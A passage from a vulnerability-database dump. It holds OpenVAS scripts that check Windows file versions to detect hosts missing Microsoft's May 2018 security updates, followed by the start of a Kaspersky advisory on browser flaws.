to,\n\n - Microsoft browsers improperly access objects in memory.\n\n - The Win32k component fails to properly handle objects in memory.\n\n - Windows kernel fails to properly handle objects in memory.\n\n - The VBScript engine improperly handles objects in memory.\n\n - The scripting engine improperly handles objects in memory in Microsoft browsers.\n\n - Windows Common Log File System (CLFS) driver improperly handles objects in memory.\n\n - Chakra improperly discloses the contents of its memory.\n\n - Windows Hyper-V on a host server fails to properly validate input from an\n authenticated user on a guest operating system.\n\n - Windows 'its://' protocol handler unnecessarily sends traffic to a remote site\n in order to determine the zone of a provided URL.\n\n - An error in Credential Security Support Provider protocol (CredSSP).\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to gain the same user rights as the current user, run arbitrary\n code, disclose sensitive information and run processes in an elevated context\n and it may lead to further compromise of the system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 for 32-bit/x64\n\n - Microsoft Windows Server 2012 R2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4103725\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"mshtml.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"11.0.9600.19003\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\mshtml.dll\",\n file_version:fileVer, vulnerable_range:\"Less than 11.0.9600.19003\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:06:19", "description": "This host is missing a critical security\n update according to Microsoft KB4103716", "cvss3": {}, "published": "2018-05-09T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4103716)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-0959", "CVE-2018-0765", "CVE-2018-8174", "CVE-2018-8134", "CVE-2018-0854", "CVE-2018-8136", "CVE-2018-8126", "CVE-2018-0824", "CVE-2018-8164", "CVE-2018-8178", "CVE-2018-8132", "CVE-2018-0955", "CVE-2018-8179", "CVE-2018-0954", "CVE-2018-8127", "CVE-2018-8165", "CVE-2018-0953", "CVE-2018-8124", "CVE-2018-8112", "CVE-2018-8133", "CVE-2018-0958", "CVE-2018-8145", "CVE-2018-1039", "CVE-2018-8897", "CVE-2018-8122", "CVE-2018-8167", "CVE-2018-8166", "CVE-2017-11927", "CVE-2018-8129", "CVE-2018-0886", "CVE-2018-8137", "CVE-2018-1022", "CVE-2018-8114", "CVE-2018-0943", "CVE-2018-1025"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310813342", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813342", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4103716)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813342\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-0765\", \"CVE-2018-0954\", \"CVE-2018-0955\", \"CVE-2018-0958\",\n \"CVE-2018-0959\", \"CVE-2018-1022\", \"CVE-2018-1025\", \"CVE-2018-1039\",\n \"CVE-2018-8112\", \"CVE-2018-8114\", \"CVE-2018-8122\", \"CVE-2018-8124\",\n \"CVE-2018-8126\", \"CVE-2018-8127\", \"CVE-2018-8129\", \"CVE-2018-8132\",\n \"CVE-2018-8133\", \"CVE-2018-8134\", \"CVE-2018-8136\", \"CVE-2018-8137\",\n \"CVE-2018-8145\", \"CVE-2018-8164\", \"CVE-2018-8165\", \"CVE-2018-8166\",\n \"CVE-2018-8167\", \"CVE-2018-8174\", \"CVE-2018-8178\", \"CVE-2018-8179\",\n \"CVE-2018-8897\", \"CVE-2018-0824\", \"CVE-2018-0854\", \"CVE-2018-0943\",\n \"CVE-2018-0953\", \"CVE-2018-0886\", \"CVE-2017-11927\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-05-09 10:30:13 +0530 (Wed, 09 May 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4103716)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4103716\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Windows Common Log File System (CLFS) driver improperly handles objects in\n memory.\n\n - The Win32k component fails to properly handle objects in memory.\n\n - The DirectX Graphics Kernel (DXGKRNL) driver improperly handles objects\n in memory.\n\n - Windows kernel fails to properly handle objects in memory.\n\n - Chakra improperly discloses the contents of its memory.\n\n - Scripting engine improperly handles objects in memory in microsoft browsers.\n\n - Internet Explorer fails to validate User Mode Code Integrity (UMCI) policies.\n\n - Chakra scripting engine improperly handles objects in memory in\n Microsoft Edge.\n\n - Windows Kernel API improperly enforces permissions.\n\n - Microsoft Edge improperly handles requests of different origins.\n\n - Windows Hyper-V on a host server fails to properly validate input from an\n authenticated user on a guest operating system.\n\n - Windows 'its://' protocol handler unnecessarily sends traffic to a remote site in\n order to determine the zone of a provided URL.\n\n - An error in Credential Security Support Provider protocol (CredSSP).\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run processes in an elevated context, run arbitrary code in kernel mode,\n circumvent a User Mode Code Integrity (UMCI) policy on the machine, gain the\n same user rights as the current user, discloses information to further\n compromise the user's computer or data, interrupt system functionality and\n cause denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 for 32-bit Systems\n\n - Microsoft Windows 10 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4103716\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10240.0\", test_version2:\"11.0.10240.17860\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.10240.0 - 11.0.10240.17860\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:28:52", "description": "This host is missing a critical security\n update according to Microsoft KB4103723", "cvss3": {}, "published": "2018-05-09T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4103723)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-0959", "CVE-2018-0765", "CVE-2018-8174", "CVE-2018-8134", "CVE-2018-0961", "CVE-2018-0854", "CVE-2018-8136", "CVE-2018-8126", "CVE-2018-0824", "CVE-2018-8164", "CVE-2018-8178", "CVE-2018-8132", "CVE-2018-0955", "CVE-2018-8179", "CVE-2018-0951", "CVE-2018-0954", "CVE-2018-8127", "CVE-2018-8165", "CVE-2018-0953", "CVE-2018-8124", "CVE-2018-8112", "CVE-2018-8133", "CVE-2018-0958", "CVE-2018-8145", "CVE-2018-1039", "CVE-2018-8897", "CVE-2018-8122", "CVE-2018-8167", "CVE-2018-8166", "CVE-2017-11927", "CVE-2018-8129", "CVE-2018-0886", "CVE-2018-8137", "CVE-2018-1022", "CVE-2018-8114", "CVE-2018-0943", "CVE-2018-1025"], "modified": "2019-12-20T00:00:00", "id": "OPENVAS:1361412562310813340", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813340", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4103723)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813340\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2018-0765\", \"CVE-2018-0954\", \"CVE-2018-0955\", \"CVE-2018-0958\",\n \"CVE-2018-0959\", \"CVE-2018-0961\", \"CVE-2018-1022\", \"CVE-2018-1025\",\n \"CVE-2018-1039\", \"CVE-2018-8112\", \"CVE-2018-8114\", \"CVE-2018-8122\",\n \"CVE-2018-8124\", \"CVE-2018-8126\", \"CVE-2018-8127\", \"CVE-2018-8129\",\n \"CVE-2018-8132\", \"CVE-2018-8133\", \"CVE-2018-8134\", \"CVE-2018-8136\",\n \"CVE-2018-8137\", \"CVE-2018-8145\", \"CVE-2018-8164\", \"CVE-2018-8165\",\n \"CVE-2018-8166\", \"CVE-2018-8167\", \"CVE-2018-8174\", \"CVE-2018-8178\",\n \"CVE-2018-8179\", \"CVE-2018-8897\", \"CVE-2018-0824\", \"CVE-2018-0854\",\n \"CVE-2018-0943\", \"CVE-2018-0951\", \"CVE-2018-0953\", \"CVE-2017-11927\",\n \"CVE-2018-0886\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-09 10:00:32 +0530 (Wed, 09 May 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4103723)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4103723\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Windows Common Log File System (CLFS) driver improperly handles objects in\n memory.\n\n - The Win32k component fails to properly handle objects in memory.\n\n - The DirectX Graphics Kernel (DXGKRNL) driver improperly handles objects\n in memory.\n\n - Windows kernel fails to properly handle objects in memory.\n\n - Chakra improperly discloses the contents of its memory.\n\n - Scripting engine improperly handles objects in memory in microsoft browsers.\n\n - Internet Explorer fails to validate User Mode Code Integrity (UMCI) policies.\n\n - Microsoft browsers improperly handle objects in memory.\n\n - Windows Hyper-V on a host server fails to properly validate vSMB packet data.\n\n - Chakra scripting engine improperly handles objects in memory.\n\n - Windows Kernel API improperly enforces permissions.\n\n - Windows Hyper-V on a host server fails to properly validate input from an\n authenticated user on a guest operating system.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run processes in an elevated context, run arbitrary code in kernel mode,\n bypass security restrictions, obtain information to further compromise the\n user's system, interrupt system functionality and cause denial of service\n condition.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1607 x32/x64\n\n - Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4103723\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.2247\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.14393.0 - 11.0.14393.2247\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:06:12", "description": "This host is missing a critical security\n update according to Microsoft KB4103731", "cvss3": {}, "published": "2018-05-09T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4103731)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-0959", "CVE-2018-0765", "CVE-2018-8174", "CVE-2018-0946", "CVE-2018-8134", "CVE-2018-0961", "CVE-2018-0854", "CVE-2018-8136", "CVE-2018-8126", "CVE-2018-0824", "CVE-2018-8164", "CVE-2018-8178", "CVE-2018-8170", "CVE-2018-8132", "CVE-2018-0955", "CVE-2018-8179", "CVE-2018-0951", "CVE-2018-0954", "CVE-2018-8127", "CVE-2018-8165", "CVE-2018-0953", "CVE-2018-8124", "CVE-2018-8112", "CVE-2018-8128", "CVE-2018-8133", "CVE-2018-0958", "CVE-2018-8145", "CVE-2018-1039", "CVE-2018-8897", "CVE-2018-8122", "CVE-2018-8167", "CVE-2018-8166", "CVE-2017-11927", "CVE-2018-8129", "CVE-2018-0886", "CVE-2018-8137", "CVE-2018-1022", "CVE-2018-8114", "CVE-2018-0943", "CVE-2018-1025"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310813341", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813341", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4103731)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813341\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-0765\", \"CVE-2018-8114\", \"CVE-2018-8122\", \"CVE-2018-8126\",\n \"CVE-2018-8127\", \"CVE-2018-8128\", \"CVE-2018-8129\", \"CVE-2018-8132\",\n \"CVE-2018-8133\", \"CVE-2018-8134\", \"CVE-2018-8136\", \"CVE-2018-8137\",\n \"CVE-2018-8145\", \"CVE-2018-8164\", \"CVE-2018-8165\", \"CVE-2018-8166\",\n \"CVE-2018-8167\", \"CVE-2018-8170\", \"CVE-2018-8174\", \"CVE-2018-8178\",\n \"CVE-2018-8179\", \"CVE-2018-8897\", \"CVE-2018-0886\", \"CVE-2018-0824\",\n \"CVE-2018-0854\", \"CVE-2018-0943\", \"CVE-2018-0946\", \"CVE-2018-0951\",\n \"CVE-2018-0953\", \"CVE-2018-0954\", \"CVE-2018-0955\", \"CVE-2018-0958\",\n \"CVE-2018-0959\", \"CVE-2018-0961\", \"CVE-2018-1022\", \"CVE-2018-1025\",\n \"CVE-2018-1039\", \"CVE-2018-8112\", \"CVE-2018-8124\", \"CVE-2017-11927\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-05-09 09:17:05 +0530 (Wed, 09 May 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4103731)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4103731\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Windows Common Log File System (CLFS) driver improperly handles objects\n in memory.\n\n - The Win32k component fails to properly handle objects in memory.\n\n - The DirectX Graphics Kernel (DXGKRNL) driver improperly handles objects\n in memory.\n\n - Windows kernel fails to properly handle objects in memory.\n\n - Scripting engine improperly handles objects in memory in microsoft browsers.\n\n - Chakra improperly discloses the contents of its memory.\n\n - Windows kernel improperly handles objects in memory.\n\n - Internet Explorer fails to validate User Mode Code Integrity (UMCI)\n policies.\n\n - Windows Hyper-V on a host server fails to properly validate vSMB packet\n data.\n\n - Chakra scripting engine handles objects in memory in Microsoft Edge.\n\n - Microsoft browsers improperly access objects in memory.\n\n - Windows Kernel API improperly enforces permissions.\n\n - Microsoft Edge improperly handles requests of different origins.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run processes in an elevated context, run arbitrary code in kernel mode,\n bypass security restrictions, gain the same user rights as the current user,\n disclose information to further compromise the user's computer or data,\n interrupt system functionality and also cause denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1703 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4103731\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.15063.0\", test_version2:\"11.0.15063.1087\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.15063.0 - 11.0.15063.1087\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:06:01", "description": "This host is missing a critical security\n update according to Microsoft KB4103727", "cvss3": {}, "published": "2018-05-09T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4103727)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-0959", "CVE-2018-0765", "CVE-2018-8174", "CVE-2018-0946", "CVE-2018-8134", "CVE-2018-0961", "CVE-2018-0854", "CVE-2018-8136", "CVE-2018-8126", "CVE-2018-0963", "CVE-2018-0824", "CVE-2018-8164", "CVE-2018-8178", "CVE-2018-8170", "CVE-2018-8132", "CVE-2018-1021", "CVE-2018-0955", "CVE-2018-8179", "CVE-2018-0951", "CVE-2018-0954", "CVE-2018-8127", "CVE-2018-8165", "CVE-2018-0953", "CVE-2018-8124", "CVE-2018-8112", "CVE-2018-8128", "CVE-2018-8123", "CVE-2018-8133", "CVE-2018-0958", "CVE-2018-8145", "CVE-2018-1039", "CVE-2018-8141", "CVE-2018-8897", "CVE-2018-8130", "CVE-2018-8122", "CVE-2018-8167", "CVE-2018-8166", "CVE-2017-11927", "CVE-2018-8129", "CVE-2018-0886", "CVE-2018-8137", "CVE-2018-1022", "CVE-2018-8114", "CVE-2018-0943", "CVE-2018-1025"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310813346", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813346", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4103727)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813346\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-0765\", \"CVE-2018-0954\", \"CVE-2018-0955\", \"CVE-2018-0958\",\n \"CVE-2018-0959\", \"CVE-2018-0961\", \"CVE-2018-1021\", \"CVE-2018-1022\",\n \"CVE-2018-1025\", \"CVE-2018-1039\", \"CVE-2018-8112\", \"CVE-2018-8114\",\n \"CVE-2018-8122\", \"CVE-2018-8123\", \"CVE-2018-8124\", \"CVE-2018-8126\",\n \"CVE-2018-8127\", \"CVE-2018-8128\", \"CVE-2018-8129\", \"CVE-2018-8130\",\n \"CVE-2018-8132\", \"CVE-2018-8133\", \"CVE-2018-8134\", \"CVE-2018-8136\",\n \"CVE-2018-8137\", \"CVE-2018-8141\", \"CVE-2018-8145\", \"CVE-2018-8164\",\n \"CVE-2018-8165\", \"CVE-2018-8166\", \"CVE-2018-8167\", \"CVE-2018-8170\",\n \"CVE-2018-8174\", \"CVE-2018-8178\", \"CVE-2018-8179\", \"CVE-2018-8897\",\n \"CVE-2018-0824\", \"CVE-2018-0854\", \"CVE-2018-0943\", \"CVE-2018-0946\",\n \"CVE-2018-0951\", \"CVE-2018-0953\", \"CVE-2017-11927\", \"CVE-2018-0886\",\n \"CVE-2018-0963\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-05-09 11:45:30 +0530 (Wed, 09 May 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4103727)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4103727\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Windows Common Log File System (CLFS) driver improperly handles objects\n in memory.\n\n - The Win32k component fails to properly handle objects in memory.\n\n - The DirectX Graphics Kernel (DXGKRNL) driver improperly handles objects\n in memory.\n\n - Windows kernel fails to properly handle objects in memory.\n\n - Scripting engine improperly handles objects in memory in microsoft browsers.\n\n - Chakra improperly discloses the contents of its memory.\n\n - Internet Explorer fails to validate User Mode Code Integrity (UMCI) policies.\n\n - Windows Hyper-V on a host server fails to properly validate vSMB packet data.\n\n - Windows Kernel API improperly enforces permissions.\n\n - Microsoft Edge improperly handles requests of different origins.\n\n - Windows Hyper-V on a host server fails to properly validate input from an\n authenticated user on a guest operating system.\n\n - An error in Credential Security Support Provider protocol (CredSSP).\n\n - Windows its:// protocol handler unnecessarily sends traffic to a remote\n site in order to determine the zone of a provided URL.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run processes in an elevated context, run arbitrary code in kernel mode,\n obtain information to further compromise the users system, bypass security\n restrictions, interrupt system and cause denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1709 for 32-bit Systems\n\n - Microsoft Windows 10 Version 1709 for 64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4103727\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.16299.0\", test_version2:\"11.0.16299.430\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.16299.0 - 11.0.16299.430\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2021-08-18T11:15:34", "description": "### *Detect date*:\n12/12/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Browsers. Malicious users can exploit these vulnerabilities to execute arbitrary code, obtain sensitive information.\n\n### *Affected products*:\nChakraCore \nMicrosoft Edge (EdgeHTML-based) \nInternet Explorer 9 \nInternet Explorer 10 \nInternet Explorer 11\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-11886](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11886>) \n[CVE-2017-11887](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11887>) \n[CVE-2017-11888](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-11888>) 